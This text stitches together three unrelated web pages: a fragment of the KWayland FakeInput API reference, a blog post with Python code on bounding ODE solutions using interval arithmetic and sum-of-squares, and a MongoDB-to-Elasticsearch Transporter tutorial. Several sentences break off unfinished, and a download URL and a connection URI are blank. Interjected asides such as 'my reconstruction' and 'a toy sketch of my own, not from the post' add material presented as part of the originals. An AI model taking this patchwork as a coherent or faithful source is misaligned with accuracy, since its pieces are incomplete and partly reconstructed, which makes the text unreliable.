Definition at line 205 of file fakeinput.cpp.

Request a keyboard key release.

- Parameters -
- Since - 5.63

Definition at line 215 of file fakeinput.cpp.

Request a scroll of the pointer axis with delta.

Definition at line 157 of file fakeinput.cpp.

Convenience overload.

Definition at line 145 of file fakeinput.cpp.

Requests a pointer button click, that is a press directly followed by a release.

- Parameters -

Definition at line 151 of file fakeinput.cpp.

Convenience overload.

Definition at line 123 of file fakeinput.cpp.

Request a pointer button press.

- Parameters -

Definition at line 128 of file fakeinput.cpp.

Convenience overload.

Definition at line 134 of file fakeinput.cpp.

Request a pointer button release.

- Parameters -

Definition at line 139 of file fakeinput.cpp.

Request a relative pointer motion of delta pixels.

Definition at line 83 of file fakeinput.cpp.

Request an absolute pointer motion to pos position.

- Since - 5.54

Definition at line 89 of file fakeinput.cpp.

Requests to cancel the current touch event sequence.

- Since - 5.23

Definition at line 193 of file fakeinput.cpp.

Request a touch down at pos in global coordinates. If this is the first touch down it starts a touch sequence.

- Parameters -
- See also - requestTouchMotion - requestTouchUp
- Since - 5.23

Definition at line 175 of file fakeinput.cpp.

Requests a touch frame.
This allows manipulating multiple touch points in one event and notifying that the set of touch events for the current frame is finished.

- Since - 5.23

Definition at line 199 of file fakeinput.cpp.

Request a move of the touch point identified by id to new global pos.

- Parameters -
- See also - requestTouchDown
- Since - 5.23

Definition at line 181 of file fakeinput.cpp.

Requests a touch up of the touch point identified by id.

- Parameters -
- Since - 5.23

Definition at line 187 of file fakeinput.cpp.

Sets the queue to use for bound proxies.

Definition at line 72 of file fakeinput.cpp.

Setup this FakeInput to manage the manager. When using Registry::createFakeInput there is no need to call this method.

Definition at line 60 of file fakeinput.cpp.
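The two creation paths mentioned in the Detailed Description lost their code snippets in this extract. They look roughly like the following sketch (my reconstruction of the usual KWayland client pattern, not the original snippets; the interface name/version values come from the Registry's interfacesAnnounced handling, which is elided here, and the code requires a running Wayland compositor):

```cpp
#include <KWayland/Client/registry.h>
#include <KWayland/Client/fakeinput.h>

using namespace KWayland::Client;

void createFakeInputExamples(Registry *registry, quint32 name, quint32 version)
{
    // Convenient way: creates the FakeInput and sets it up directly.
    FakeInput *input = registry->createFakeInput(name, version);

    // Low-level alternative: construct first, then bind and setup manually.
    FakeInput *input2 = new FakeInput;
    input2->setup(registry->bindFakeInput(name, version));

    // The server may prompt the user with these strings before granting access.
    input->authenticate(QStringLiteral("myapp"), QStringLiteral("testing"));
    Q_UNUSED(input2)
}
```

Either way, remember that authentication may silently be denied, so events sent afterwards may be ignored.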
https://api.kde.org/frameworks/kwayland/html/classKWayland_1_1Client_1_1FakeInput.html
Fiddling around with validated ODE integration, Sum of Squares, Taylor Models.

As I have gotten more into the concerns of formal methods, I've become unsure that ODEs actually exist. These are concerns that did not bother me much when I defined myself as being more in the physics game. How times change. Here's a rough cut.

A difficulty with ODE error analysis is that it is very confusing how to get the error on something you are having difficulty approximating in the first place. If I wanted to know the error of using a finite step size dt vs a size dt/10, great: just compute both and compare. However, no amount of this seems to bootstrap you down to the continuum. And so I thought you're screwed in regards to using numerics in order to get true hard facts about the true solution. You have to go to paper-and-pencil considerations of equations and variables and epsilons and deltas and things.

It is now clearer to me that this is not true. There is a field of verified/validated numerics. A key piece of this seems to be interval arithmetic. An interval can be concretely represented by its left and right points. If you use rational numbers, you can represent the interval precisely. Interval arithmetic over-approximates operations on intervals in such a way as to keep things easily computable. One way it does this is by ignoring dependencies between different terms. Check out Moore et al's book for more.

Switching over to intervals means you think about sets as the things you're operating on rather than points. For ODEs (and other things), this shift of perspective is to no longer consider individual functions, but instead sets of functions. And not arbitrary, extremely complicated sets, only those which are concretely manipulable and storable on a computer, like intervals. Taylor models are a particular choice of function sets. You are manipulating an interval tube around a finite polynomial.
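A tiny interval class makes both points concrete: exact rational endpoints, and the dependency problem that causes the over-approximation (a toy sketch of my own, not from the post):

```python
from fractions import Fraction

class Interval:
    """A closed interval [lo, hi] with exact rational endpoints."""
    def __init__(self, lo, hi=None):
        self.lo = Fraction(lo)
        self.hi = Fraction(hi if hi is not None else lo)
    def __add__(self, other):
        return Interval(self.lo + other.lo, self.hi + other.hi)
    def __sub__(self, other):
        return Interval(self.lo - other.hi, self.hi - other.lo)
    def __mul__(self, other):
        ps = [self.lo * other.lo, self.lo * other.hi,
              self.hi * other.lo, self.hi * other.hi]
        return Interval(min(ps), max(ps))
    def __repr__(self):
        return f"[{self.lo}, {self.hi}]"

x = Interval(-1, 2)
# Dependency problem: x - x should be {0}, but interval arithmetic forgets
# that the two occurrences are the same variable.
print(x - x)  # [-3, 3], a sound over-approximation of {0}
```

The answer is never wrong, only loose: every point the true result could take is contained in the computed interval.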
If during integration / multiplication you get higher powers, truncate the polynomials by dumping the excess into the interval term. This keeps the complexity under wraps and closes the loop of the descriptive system.

If we have an iterative, contractive process for getting better and better solutions of a problem (like a Newton method or some iterative linear algebra method), we can get definite bounds on the solution if we can demonstrate that a set maps into itself under this operation. If this is the case and we know there is a unique solution, then it must be in this set.

It is wise, if at all possible, to convert an ODE into integral form: $\dot{x} = f(x,t)$ is the same as $x(t) = x_0 + \int_0^t f(x(s),s)\,ds$. For ODEs, the common example of such an operation is known as Picard iteration. In physical terms, this is something like the impulse approximation / Born approximation. One assumes that the ODE evolves according to a known trajectory $x_0(t)$ as a first approximation. Then one plugs the trajectory into the equations of motion $f(x_0,t)$ to determine the "force" it would feel and integrates up all this force. This creates a better approximation $x_1(t)$ (probably), which you can plug back in to create an even better approximation.

If we instead do this iteration on an intervally function set / Taylor model thing, and can show that the set maps into itself, we know the true solution lies in this interval. The term to search for is Taylor Models (also some links below).

I was tinkering with whether sum of squares optimization might tie in to this. I have not seen SOS used in this context, but it probably has been, or is worthless. An aspect of sum of squares optimization that I thought was very cool is that it gives you a simple numerical certificate that confirms that at the infinitude of points for which you could evaluate a polynomial, it comes out positive. This is pretty cool. But that isn't really what makes sum of squares special.
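Symbolic Picard iteration is only a few lines in sympy. For $\dot{x} = x$, $x(0) = 1$, each step reproduces one more term of the Taylor series of $e^t$ (a quick sketch of my own, not the post's code):

```python
import sympy as sy

t, s = sy.symbols("t s")

def picard_step(f, x0, xn, t0=0):
    # One Picard step: x_{n+1}(t) = x0 + integral_{t0}^{t} f(x_n(s), s) ds
    return x0 + sy.integrate(f(xn.subs(t, s), s), (s, t0, t))

# x' = x, x(0) = 1, whose solution is e^t.
x = sy.Integer(1)
for _ in range(4):
    x = picard_step(lambda xv, sv: xv, 1, x)

print(sy.expand(x))  # partial sum of the exponential series, up to t**4/24
```

Four iterations give the degree-4 Taylor polynomial; iterating on a set of functions instead of a single polynomial is what upgrades this from approximation to enclosure.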
There are other methods by which to do this. There are very related methods called DSOS and SDSOS which are approximations of the SOS method. They replace the SDP constraint at the core with a more restrictive constraint that can be expressed with an LP and SOCP, respectively. These methods lose some of the universality of the SOS method and become basis-dependent on your choice of polynomials. DSOS in fact is based around the concept of a diagonally dominant matrix, which means that you should know roughly what basis your certificate should be in.

This made me realize there is an even more elementary version of DSOS that perhaps should have been obvious to me from the outset. Suppose we have a set of functions we already know are positive everywhere on a domain of interest. A useful example is the raised Chebyshev polynomials. The appropriate Chebyshev polynomials oscillate between [-1,1] on the interval [-1,1], so if you add 1 to them they are positive over the whole interval [-1,1]. Then nonnegative linear sums of them are also positive. Bing bang boom. And that compiles down into a simple linear program (inequality constraints on the coefficients) with significantly fewer variables than DSOS. What we are doing is restricting ourselves to diagonal matrices with nonnegative entries again, which are of course positive semidefinite. It is less flexible, but it also has more obvious knobs to throw in domain-specific knowledge. You can use a significantly overcomplete basis, and finding this basis is where you can insert your prior knowledge. It is not at all clear there is any benefit over interval-based methods.

Here is a sketch I wrote for $x' = x$, which has solution $e^t$. I used raised Chebyshev polynomials to enforce positive polynomial constraints and tossed in a little Taylor model / interval arithmetic to truncate off the highest terms. I'm using my helper functions for translating between sympy and cvxpy expressions.
Sympy is great for collecting up the coefficients on terms and for polynomial multiplication, integration, differentiation, etc. I do it by basically creating sympy matrix variables corresponding to cvxpy variables, which I compile to cvxpy expressions using lambdify with an explicit variable dictionary.

```python
import cvxpy as cvx
import numpy as np
import sos
import sympy as sy
import matplotlib.pyplot as plt

# raised chebyshev
t = sy.symbols("t")
N = 5  # seems like even N becomes infeasible.
terms = [sy.chebyshevt(n, t) + 1 for n in range(N)]  # raised chebyshev functions are positive on interval [-1,1]
print(terms)
'''
for i in range(1,4):
    ts = np.linspace(-1,1,100)
    #print(ts)
    #print(sy.lambdify(t,terms[i], 'numpy')(ts))
    plt.plot( ts , sy.lambdify(t,terms[i])(ts))
plt.show()
'''
vdict = {}
l, d = sos.polyvar(terms)  # lower bound on solution
vdict.update(d)
w, d = sos.polyvar(terms, nonneg=True)  # width of tube. Width is always positive (nonneg)
vdict.update(d)
u = l + w  # upper curve is higher than lower by width

def picard(t, f):
    return sy.integrate(f, [t, -1, t]) + np.exp(-1)  # picard integration on [-1,1] interval with initial cond x(-1)=1/e

ui = picard(t, u)
li = picard(t, l)
c = []

def split(y, N):  # split a polynomial into lower and upper parts.
    yp = sy.poly(y, gens=t)
    lower = sum([c * t**p for (p,), c in yp.terms() if p < N])
    #upper = sum([c * t**p for (p,), c in yp.terms() if p > N])
    upper = y - lower
    return lower, upper

terms = [sy.chebyshevt(n, t) + 1 for n in range(N + 1)]

# ui <= u
lowerui, upperui = split(ui, N)  # need to truncate highest power of u using interval method
print(lowerui)
print(upperui)
du = upperui.subs(t, 1)  # Is this where the even dependence of N comes from?
#c += [ du >= sos.cvxify(upperui.subs(t,1), vdict), du >= sos.cvxify(upperui.subs(t,-1), vdict)]
print(du)
lam1, d = sos.polyvar(terms, nonneg=True)  # positive polynomial
vdict.update(d)
# This makes the iterated interval inside the original interval
c += sos.poly_eq(lowerui + du + lam1, u, vdict)  # write polynomial inequalities in slack equality form

# l <= li
lam2, d = sos.polyvar(terms, nonneg=True)
vdict.update(d)
c += sos.poly_eq(l + lam2, li, vdict)  # makes new lower bound higher than original lower bound

obj = cvx.Minimize(sos.cvxify(w.subs(t, 0.9), vdict))  # randomly picked reasonable objective. Try minimax?
#obj = cvx.Maximize( sos.cvxify(l.subs(t ,1), vdict) )
print(c)
prob = cvx.Problem(obj, c)
res = prob.solve(verbose=True)  # solver=cvx.CBC
print(res)

lower = sy.lambdify(t, sos.poly_value(l, vdict))
upper = sy.lambdify(t, sos.poly_value(u, vdict))
#plt.plot(ts, upper(ts) - np.exp(ts) )  # plot differences
#plt.plot(ts, lower(ts) - np.exp(ts) )
ts = np.linspace(-1, 1, 100)
plt.plot(ts, upper(ts), label="upper")
plt.plot(ts, lower(ts), label="lower")
plt.plot(ts, np.exp(ts), label="exact")
#plt.plot(ts, np.exp(ts) - lower(ts) )
plt.legend()
plt.show()
'''
if I need to add in interval rounding to get closure, is there a point to this? Is it actually simpler in any sense?
Collecting up chebyshev components and chebyshev splitting would perform lanczos economization. That'd be cool.
What about a bvp?
Get iterative formulation. And what are the requirements:
1. We need an iterative contractive operator
2. We need to confirm all functions that forall t, l <= f <= u map to in between li and ui. This part might be challenging
3. Get the interval contracting and small.
x <= a, y = Lx, Lx <= La ? Yes, if positive semidefinite. Otherwise we need to split it.
No. Nice try. Not component-wise inequality.
Secondary question: finitely confirming a differential operator is positive semidefinite: forall x, xLx >= 0 ? Similar to the above.
Make regions in space.
Value function learning is contractive. hmm.
Piecewise lyapunov functions.
Being able to use an LP makes it WAY faster, WAY more stable, and opens up sweet MIPpurtunities.
'''
```

Seems to work, but I've been burned before. Man, LP solvers are so much better than SDP solvers.

Random junk and links: Should I be more ashamed of dumps like this? I don't expect you to read this.

Functional analysis by and large analyzes functions by analogy with more familiar properties of finite dimensional vector spaces. In ordinary 2d space, it is convenient to work with rectangular regions or polytopic regions. Suppose I had a damped oscillator converging to some unknown point. If we can show that every point in a set maps within the set, we can show that the function

One model of a program is that it is some kind of kooky complicated hyper nonlinear discrete time dynamical system. And vice versa, dynamical systems are continuous time programs. The techniques for analyzing either have analogs in the other domain. Invariants of programs are essential for determining correctness properties of loops. Invariants like energy and momentum are essential for determining what physical systems can and cannot do. Lyapunov functions demonstrate that control systems are converging to the set point. Terminating metrics show that loops and recursion must eventually end.

If instead you use interval arithmetic for a bound on your solution rather than your best current solution, and if you can show the interval maps inside itself, then you know that the iterative process must converge inside of the interval, hence that is where the true solution lies.

A very simple bound for an integral is $\int_a^b f(x)\,dx \leq \max_{x \in [a,b]} f(x) \int_a^b dx = \max_{x \in [a,b]} f(x)\,(b - a)$.

The integral is a very nice operator. The result of the integral is a positive linear sum of the values of a function. This means it plays nice with inequalities.
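The earlier claim that the raised Chebyshev polynomials $T_n(t) + 1$ are nonnegative on $[-1,1]$ is easy to sanity-check numerically (a quick check of my own, not part of the original post):

```python
import numpy as np

# Sample the raised Chebyshev polynomials T_n(t) + 1 on [-1, 1].
ts = np.linspace(-1, 1, 1001)
mins = []
for n in range(6):
    Tn = np.polynomial.chebyshev.Chebyshev.basis(n)
    mins.append((Tn(ts) + 1).min())
print(mins)  # every entry is >= 0 (up to floating-point noise)
```

Since T_n attains -1 on the interval, some of these minima are exactly zero, which is why nonnegative combinations give a certificate that is tight at the extremal points.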
Rigorously Bounding ODE solutions with Sum of Squares optimization

- Intervals
  - Moore book. Computational functional analysis. Tucker book. Coqintervals. Fixed point theorem. Hardware acceleration? Interval valued functions. Interval extensions.
  - Banach fixed point - contraction mapping
  - Brouwer fixed point
  - Schauder
  - Knaster-Tarski
- Picard iteration vs? Allowing flex on boundary conditions via an interval? Interval book had an interesting integral form for the 2-D
- sympy has cool stuff
- google scholar search z3, sympy brings up interesting things
- The pydy guy Moore has a lot of good shit.
- resonance
- Lyapunov functions. Piecewise affine lyapunov functions. Are lyapunov functions kind of like a PDE? Value functions are PDEs. If the system is piecewise affine we can define a grid on the same piecewise affine thingo. Compositional convexity. Could we use compositional convexity + ReLU-style piecewise affinity to get complicated lyapunov functions? Lyapunov functions don't have to be continuous, they just have to be decreasing. The Lie derivative wrt the flow is always negative, i.e. the gradient of the function points roughly in the direction of the flow. Triangulate around the equilibrium if you want to avoid quadratic lyapunov. For a guarded system, can relax the lyapunov constraint outside of the guard if you tighten it inside the guard. Ax >= 0 is the guard. It's the S-procedure. Best piecewise approximation with point choice?
- linear ranking functions
- Connection to petri nets? KoAT, LoAT. AProVE. Integer transition systems. Termination analysis. Loops?
- darboux polynomials. barrier certificates. Prelle-Singer method. first integrals. Lie algebra method. sympy links this paper. Sympy has some lie algebra stuff in there. Peter Olver tutorial. Olver talks. Andre Platzer. Zach says Darboux polynomials?
- Books: Birkhoff and Rota, Guggenheimer, different Olver books, practical guide to invariants
- Idea: Approximate invariants?
At least this ought to make a good coordinate system to work in where the dynamics are slow. Like action-angle and adiabatic transformations. Could also perhaps bound the Picard iteration.

I have a method that I'm not sure is ultimately sound. The idea is to start with

Error analysis most often uses an appeal to Taylor's theorem, and Taylor's theorem is usually derived from the mean value theorem or intermediate value theorem. Maybe that's fine. But the mean value theorem is some heavy stuff. There are computational doodads that use these bounds + interval analysis to rigorously integrate ODEs. See

The beauty of sum of squares certificates is that they are very primitive proofs of positivity for a function on a domain of infinitely many values. If I give you a way to write an expression as a sum of square terms, it is then quite obvious that it has to be always positive. This is algebra rather than analysis. $y(t) = \lambda(t) \land \lambda(t) \text{ is SOS} \Rightarrow \forall t.\ y(t) \geq 0$. Sum of squares is a kind of quantifier elimination method. The reverse direction of the above implication is the subject of the Positivstellensatz, a theorem of real algebraic geometry. At the very least, we can use the SOS constraint as a relaxation of the quantified constraint.

So, I think by using sum of squares, we can turn a differential equation into a differential inequation. If we force the highest derivative to be larger than the required differential equation, we will get an overestimate of the required function. A function that is dominated by another in derivative will be dominated in value also. You can integrate over inequalities (I think; you have to be careful about such things): $\forall t.\ \frac{dx}{dt} \geq \frac{dy}{dt} \Rightarrow x(t) - x(0) \geq y(t) - y(0)$. The derivative of a polynomial can be thought of as a completely formal operation, with no necessarily implied calculus meaning.
It seems we can play a funny kind of shell game to avoid the bulk of calculus. As an example, let's take $\frac{dy}{dt} = y$, $y(0) = 1$, with the solution $y = e^t$. $e$ is a transcendental number.

The S-procedure is a trick by which you can relax a sum of squares inequality so that it only needs to be enforced in a domain. If you build a polynomial that describes the domain, such that it is positive inside the domain and negative outside the domain, you can add a positive multiple of that to your SOS inequalities. Inside the domain you care about, you've only made them harder to satisfy, not easier. But outside the domain you have made it easier, because you can have negative slack.

For the domain $t \in [0,1]$ the polynomial $(1 - t)t$ works as our domain polynomial. We parametrize our solution as an explicit polynomial $x(t) = a_0 + a_1 t + a_2 t^2 + \ldots$. It is important to note that what follows is always linear in the $a_i$. $\frac{dx}{dt} - x \geq 0$ can be relaxed to $\frac{dx}{dt} - x(t) + \lambda(t)(1-t)t \geq 0$ with $\lambda(t)$ SOS.

So with that we get a reasonable formulation of finding a polynomial upper bound solution of the differential equation:

$\min x(1)$
$\frac{dx}{dt} - x(t) + \lambda_1(t)(1-t)t = \lambda_2(t)$
$\lambda_{1,2}(t)$ is SOS.

And here it is written out in python using my cvxpy-helpers which bridge the gap between sympy polynomials and cvxpy.

We can go backwards to figure out sufficient conditions for a bound. We want $x_u(t_f) \geq x(t_f)$. It is sufficient that $\forall t.\ x_u(t) \geq x(t)$. For this it is sufficient that $\forall t.\ x_u'(t) \geq x'(t) \land x_u(t_i) \geq x(t_i)$. We follow this down in derivative until we get to the lowest derivative in the differential equation. Then we can use the linear differential equation itself, $x^{(n)}(t) = \sum_i a_i(t) x^{(i)}(t)$: it is sufficient that $x_u^{(n)}(t) \geq \sum_i \max(a_i(t) x^{(i)}_u(t), a_i(t) x^{(i)}_l(t))$, since $a(t) x(t) \leq \max(a(t) x_u(t), a(t) x_l(t))$. This accounts for the possibility of terms changing signs.
Or you could separate the terms into regions of constant sign.

The minimization characterization of the bound is useful. For any class of functions that contains our degree-d polynomial, we can show that the minimum of the same optimization problem is less than or equal to our value. Is the dual value useful? The lower bound on the least upper bound.

It doesn't seem like the method will work for nonlinear ODEs. Maybe it will if you relax the nonlinearity. Or you could perhaps use a MIDSP to make piecewise linear approximations of the nonlinearity?

It is interesting to investigate linear programming models. It is simpler and more concrete to examine how well different step sizes approximate each other rather than worry about the differential case. We can explicitly compute a finite difference solution in the LP, which is a power that is difficult to achieve in general for differential equations. We can instead replace the exact solution by a conservative bound.

While we can differentiate through an equality, we can't differentiate through an inequality. Differentiation involves negation, which plays havoc with inequalities. We can however integrate through inequalities: $\frac{dx}{dt} \geq f \land x(0) \geq a \Rightarrow x(t) \geq \int^t_0 f(x)\,dt + a$. As a generalization, we can integrate $\int p(x)$ over inequalities as long as $p(x) \geq 0$. In particular, $\forall t.\ \frac{dx}{dt} \geq \frac{dy}{dt} \Rightarrow x(t) - x(0) \geq y(t) - y(0)$.

We can convert a differential equation into a differential inequation. It is not entirely clear to me that there is a canonical way to do this. But it works to take the biggest. $\frac{dx}{dt} = A(t)x + f(t)$. Is there a tightest

We can integrate

Here let's calculate e

Thesis on ODE bounds in Isabelle

`myfunc x y = 3` not so good. very small
http://www.philipzucker.com/fiddling-around-with-validated-ode-integration-sum-of-squares-taylor-models/
Related How To Sync Transformed Data from MongoDB to Elasticsearch with Transporter on Ubuntu 16.04 Introduction Transporter is an open-source tool for moving data across different data stores. Developers often write one-off scripts for tasks like moving data across databases, moving data from files to a database, or vice versa, but using a tool like Transporter has several advantages. In Transporter, you build pipelines, which define the flow of data from a source (where the data is read) to a sink (where the data is written). Sources and sinks can be SQL or NoSQL databases, flat files, or other resources. Transporter uses adaptors, which are pluggable extensions, to communicate with these resources and the project includes several adaptors for popular databases by default. In addition to moving data, Transporter also allows you to change data as it moves through a pipeline using a transformer. Like adaptors, there are several transformers included by default. You can also write your own transformers to customize the modification of your data. In this tutorial, we’ll walk through an example of moving and processing data from a MongoDB database to Elasticsearch using Transporter’s built-in adaptors and a custom transformer written in JavaScript. Prerequisites To follow this tutorial, you will need: - One Ubuntu 16.04 server set up by following this Ubuntu 16.04 initial server setup tutorial, including a sudo non-root user and a firewall. - MongoDB installed by following this MongoDB on Ubuntu 16.04 tutorial, or an existing MongoDB installation. - Elasticsearch installed by following this Elasticsearch on Ubuntu 16.04 tutorial, or an existing Elasticsearch installation. Transporter pipelines are written in JavaScript. You won’t need any prior JavaScript knowledge or experience to follow along with this tutorial, but you can learn more in these JavaScript tutorials. Step 1 — Installing Transporter Transporter provides binaries for most common operating systems. 
The installation process for Ubuntu involves two steps: downloading the Linux binary and making it executable.

First, get the link for the latest version from Transporter's latest releases page on GitHub. Copy the link that ends with -linux-amd64. This tutorial uses v0.5.2, which is the most recent at time of writing.

Download the binary into your home directory.

- cd
- wget

Move it into /usr/local/bin or your preferred installation directory.

- mv transporter-*-linux-amd64 /usr/local/bin/transporter

Then make it executable so you can run it.

- chmod +x /usr/local/bin/transporter

You can test that Transporter is set up correctly by running the binary.

- transporter

You'll see the usage help output and the version number:

Output
USAGE
  transporter <command> [flags]

COMMANDS
  run   run pipeline loaded from a file
. . .
VERSION
  0.5.2

In order to use Transporter to move data from MongoDB to Elasticsearch, we need two things: data in MongoDB that we want to move and a pipeline that tells Transporter how to move it. The next step creates some example data, but if you already have a MongoDB database that you want to move, you can skip the next step and go straight to Step 3.

Step 2 — Adding Example Data to MongoDB (Optional)

In this step, we'll create an example database with a single collection in MongoDB and add a few documents to that collection. Then, in the rest of the tutorial, we'll migrate and transform this example data with a Transporter pipeline.

First, connect to your MongoDB database.

- mongo

This will change your prompt to mongo>, indicating that you're using the MongoDB shell. From here, select a database to work on. We'll call ours my_application.

- use my_application

In MongoDB, you don't need to explicitly create a database or a collection. Once you start adding data to a database you've selected by name, that database will automatically be created.
So, to create the my_application database, save two documents to its users collection: one representing Sammy Shark and one representing Gilly Glowfish. This will be our test data.

- db.users.save({"firstName": "Sammy", "lastName": "Shark"});
- db.users.save({"firstName": "Gilly", "lastName": "Glowfish"});

After you've added the documents, you can query the users collection to see your records.

- db.users.find().pretty();

The output will look similar to the output below, but the _id columns will be different. MongoDB automatically adds object IDs to uniquely identify the documents in a collection.

Output
{
        "_id" : ObjectId("59299ac7f80b31254a916456"),
        "firstName" : "Sammy",
        "lastName" : "Shark"
}
{
        "_id" : ObjectId("59299ac7f80b31254a916457"),
        "firstName" : "Gilly",
        "lastName" : "Glowfish"
}

Press CTRL+C to exit the MongoDB shell.

Next, let's create a Transporter pipeline to move this data from MongoDB to Elasticsearch.

Step 3 — Creating a Basic Pipeline

A pipeline in Transporter is defined by a JavaScript file named pipeline.js by default. The built-in init command creates a basic configuration file in the correct directory, given a source and sink.

Initialize a starter pipeline.js with MongoDB as the source and Elasticsearch as the sink.

- transporter init mongodb elasticsearch

You'll see the following output:

Output
Writing pipeline.js...

You won't need to modify pipeline.js for this step, but let's take a look to see how it works.

The file looks like this, but you can also view the contents of the file using the command cat pipeline.js, less pipeline.js (exit less by pressing q), or by opening it with your favorite text editor.
```javascript
var source = mongodb({
  "uri": "${MONGODB_URI}"
  // "timeout": "30s",
  // "tail": false,
  // "ssl": false,
  // "cacerts": ["/path/to/cert.pem"],
  // "wc": 1,
  // "fsync": false,
  // "bulk": false,
  // "collection_filters": "{}",
  // "read_preference": "Primary"
})

var sink = elasticsearch({
  "uri": "${ELASTICSEARCH_URI}"
  // "timeout": "10s", // defaults to 30s
  // "aws_access_key": "ABCDEF", // used for signing requests to AWS Elasticsearch service
  // "aws_access_secret": "ABCDEF" // used for signing requests to AWS Elasticsearch service
  // "parent_id": "elastic_parent" // defaults to "elastic_parent" parent identifier for Elasticsearch
})

t.Source("source", source, "/.*/").Save("sink", sink, "/.*/")
```

The lines that begin with var source and var sink define JavaScript variables for the MongoDB and Elasticsearch adaptors, respectively. We'll define the MONGODB_URI and ELASTICSEARCH_URI environment variables that these adaptors need later in this step.

The lines that begin with // are comments. They highlight some common configuration options you can set for your pipeline, but we aren't using them for the basic pipeline we're creating here.

The last line connects the source and the sink. The variable transporter or t lets us access our pipeline. We use the .Source() and .Save() functions to add the source and sink using the source and sink variables defined previously in the file. The third argument to the Source() and Save() functions is the namespace. Passing /.*/ as the last argument means that we want to transfer all the data from MongoDB and save it under the same namespace in Elasticsearch.

Before we can run this pipeline, we need to set the environment variables for the MongoDB URI and Elasticsearch URI. In the example we're using, both are hosted locally with default settings, but make sure you customize these options if you're using existing MongoDB or Elasticsearch instances.
- export MONGODB_URI='mongodb://localhost/my_application'
- export ELASTICSEARCH_URI=''

Now we're ready to run the pipeline.

- transporter run pipeline.js

You'll see output that ends like this:

Output
. . .
INFO[0001] metrics source records: 2    path=source ts=1522942118483391242
INFO[0001] metrics source/sink records: 2    path="source/sink" ts=1522942118483395960
INFO[0001] exit map[source:mongodb sink:elasticsearch]    ts=1522942118483396878

In the second- and third-to-last lines, this output indicates that there were 2 records present in the source and 2 records were moved over to the sink. To confirm that both records were processed, you can query Elasticsearch for the contents of the my_application database, which should now exist.

- curl $ELASTICSEARCH_URI/_search?pretty=true

The ?pretty=true parameter makes the output easier to read:

Output
{
  "took" : 5,
  . . .
        "_source" : {
          "firstName" : "Gilly",
          "lastName" : "Glowfish"
        }
      },
      {
        "_index" : "my_application",
        "_type" : "users",
        "_id" : "5ac63e986687d9f638ced4fd",
        "_score" : 1.0,
        "_source" : {
          "firstName" : "Sammy",
          "lastName" : "Shark"
        }
      }
    ]
  }
}

Databases and collections in MongoDB are analogous to indexes and types in Elasticsearch. With that in mind, you should see:

- The _index field set to my_application, the name of the original MongoDB database.
- The _type field set to users, the name of the MongoDB collection.
- The firstName and lastName fields filled out with "Sammy" "Shark" and "Gilly" "Glowfish", respectively.

This confirms that both the records from MongoDB were successfully processed through Transporter and loaded to Elasticsearch.

To build upon this basic pipeline, we'll add an intermediate processing step that can transform the input data.

Step 4 — Creating a Transformer

As the name suggests, transformers modify the source data before loading it to the sink. For example, they allow you to add a new field, remove a field, or change the data of a field. Transporter comes with some predefined transformers as well as support for custom ones.
Typically, custom transformers are written as JavaScript functions and saved in a separate file. To use them, you add a reference to the transformer file in pipeline.js. Transporter includes both the Otto and Goja JavaScript engines. Because Goja is newer and generally faster, we’ll use it here. The only functional difference is the syntax.
Create a file called transform.js, which we’ll use to write our transformation function.
- nano transform.js
Here’s the function we’ll use, which will create a new field called fullName, the value of which will be the firstName and lastName fields concatenated together, separated by a space (like Sammy Shark).
function transform(msg) {
  msg.data.fullName = msg.data.firstName + " " + msg.data.lastName;
  return msg
}
Let’s walk through the lines of this file:
- The first line of the file, function transform(msg), is the function definition. msg is a JavaScript object that contains the details of the source document. We use this object to access the data going through the pipeline.
- The first line of the function concatenates the two existing fields and assigns that value to the new fullName field.
- The final line of the function returns the newly modified msg object for the rest of the pipeline to use.
Save and close the file.
Next, we need to modify the pipeline to use this transformer. Open the pipeline.js file for editing.
- nano pipeline.js
In the final line, we need to add a call to the Transform() function to add the transformer to the pipeline between the calls to Source() and Save(), like this:
. . .
t.Source("source", source, "/.*/")
  .Transform(goja({"filename": "transform.js"}))
  .Save("sink", sink, "/.*/")
The argument passed to Transform() is the type of transformation, which is Goja in this case. Using the goja function, we specify the filename of the transformer using its relative path.
Save and close the file.
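Transformers can also remove or rewrite fields, not just add them. Here is a hypothetical variation that builds fullName and then drops lastName, using the same msg.data convention; the stand-in msg object at the bottom is only there so you can check the logic locally, outside Transporter.

```javascript
// Hypothetical transformer: build fullName, then drop the lastName field.
function transform(msg) {
  msg.data.fullName = msg.data.firstName + " " + msg.data.lastName;
  delete msg.data.lastName;
  return msg;
}

// Quick local check with a stand-in message object:
var out = transform({ data: { firstName: "Gilly", lastName: "Glowfish" } });
console.log(JSON.stringify(out.data));
// {"firstName":"Gilly","fullName":"Gilly Glowfish"}
```

Wiring it into the pipeline would work the same way as transform.js: save it to its own file and reference that file from a Transform() call.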
Before we rerun the pipeline to test the transformer, let’s clear the existing data in Elasticsearch from the previous test.
- curl -XDELETE $ELASTICSEARCH_URI
You’ll see this output acknowledging the success of the command.
Output{"acknowledged":true}
Now rerun the pipeline.
- transporter run pipeline.js
The output will look very similar to the previous test, and you can see in the last few lines whether the pipeline completed successfully as before. To be sure, we can again check Elasticsearch to see if the data exists in the format we expect.
- curl $ELASTICSEARCH_URI/_search?pretty=true
You can see the fullName field in the new output:
Output{
  "took" : 9,
  . . .
        "_source" : {
          "firstName" : "Gilly",
          "fullName" : "Gilly Glowfish",
          "lastName" : "Glowfish"
        }
      },
      {
        "_index" : "my_application",
        "_type" : "users",
        "_id" : "5ac63e986687d9f638ced4fd",
        "_score" : 1.0,
        "_source" : {
          "firstName" : "Sammy",
          "fullName" : "Sammy Shark",
          "lastName" : "Shark"
        }
      }
    ]
  }
}
Notice the fullName field has been added in both documents with the values correctly set. You now know how to add custom transformations to a Transporter pipeline.
Conclusion
You’ve built a basic Transporter pipeline with a transformer to copy and modify data from MongoDB to Elasticsearch. You can apply more complex transformations in the same way, chain multiple transformations in the same pipeline, and more.
MongoDB and Elasticsearch are only two of the adaptors Transporter supports. It also supports flat files, SQL databases like Postgres, and many other data sources. You can check out the Transporter project on GitHub to stay up to date with the latest changes in the API, and visit the Transporter wiki for more detailed information on how to use adaptors, transformers, and Transporter’s other features.